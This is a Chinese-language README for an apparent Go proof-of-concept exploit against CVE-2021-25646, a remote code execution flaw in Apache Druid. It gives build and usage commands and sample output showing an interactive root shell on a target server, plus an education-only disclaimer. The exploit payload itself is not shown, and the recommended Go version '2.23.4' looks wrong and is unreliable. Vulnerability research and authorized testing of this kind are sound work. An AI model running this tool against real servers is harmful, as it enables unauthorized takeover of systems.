本仓库包含针对 CVE-2021-25646 的概念验证(PoC)漏洞利用代码,该漏洞是 Apache Druid 中的一个严重远程代码执行漏洞。
该漏洞利用程序使用 Go 编写,可通过终端进行交互式命令注入。
你需要安装 Go(推荐版本 2.23.4)。
go build .
这将在当前目录下生成一个二进制文件。
你可以通过构建二进制文件或直接使用 go run 来运行该漏洞利用程序。
-i : 目标 Druid 服务器 IP 地址(必需)-p : 目标 Druid 服务器端口(必需)-proxy : 指定代理 URL(可选)运行构建好的二进制文件:
./cve -i 127.0.0.1 -p 8888
或者直接使用 Go 运行:
go run main.go -i 127.0.0.1 -p 8888
$ ./cve -i 127.0.0.1 -p 8888
~ $ whoami
root
~ $ uname -a
Linux druid-server 4.15.0-123-generic #126-Ubuntu SMP ...
漏洞:
该漏洞利用程序滥用了 Druid indexer 组件中 task API 的输入验证缺陷,通过精心构造的 JSON 载荷实现命令注入。
参考资料:
本软件仅供教育目的使用。
作者不对因使用本代码造成的任何滥用或损害负责。
在测试任何系统之前,请务必获得适当授权。